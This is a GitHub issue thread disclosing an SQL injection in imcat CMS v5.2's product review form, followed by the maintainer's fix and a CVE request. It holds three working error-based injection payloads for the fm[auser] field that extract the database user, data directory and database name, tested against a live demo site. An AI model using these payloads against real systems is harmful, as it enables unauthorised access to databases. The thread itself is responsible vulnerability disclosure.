### ISSUE TITLE
Sql injection vulnerability in Latest Release v5.2 product reviews

### ISSUE THREAD

**Issue by Aquilao** [peacexie/imcat#5]
Hi, I would like to report Sql injection vulnerability in latest release(v5.2)  product reviews（/root/plus/coms/add_coms.php）

I found it in the demo(https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441)

Add a product reviews
![imcat1](https://user-images.githubusercontent.com/25531497/89128057-67c9b500-d525-11ea-8eac-e8593e7f4c0d.png)

Test the fm[auser] in request body

payload：
`'and/**/extractvalue('anything',concat('~',(select user())))and'`
![imcat2](https://user-images.githubusercontent.com/25531497/89128094-bbd49980-d525-11ea-95fd-adfc6c4101da.png)

payload:
`'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'`
![imcat3](https://user-images.githubusercontent.com/25531497/89128097-c000b700-d525-11ea-861c-e621e3494c07.png)

payload
`'and/**/extractvalue('anything',concat('~',(select database())))and'`
![image](https://user-images.githubusercontent.com/25531497/89128142-11a94180-d526-11ea-94ac-b5182648c035.png)

**Comment by peacexie** [comment]
Thanks!

I checked this error message, It done ok for insert review,
It is the bug when deel with accumulate points for the member.
By the way, did your logined as a member?

I fixed this in the site: https://imcat.txjia.com/,
Can it stop you from attacking?

Hope your massage, I'll update master branch after your checked it.

**Comment by Aquilao** [comment]
Great.I just rechecked the SQL injection on the demo and it has been fixed.

By the way, I didn't logined when I found the vulnerability.

**Comment by peacexie** [comment]
OK, Thanks!

**Comment by Aquilao** [comment]
Hi，can you help me requests a CVE？
[Requesting a CVE identification number-GitHub Docs](https://docs.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory#requesting-a-cve-identification-number)
![image](https://user-images.githubusercontent.com/25531497/90046742-74a78f00-dd03-11ea-82f5-816546d60b96.png)
Thinks.
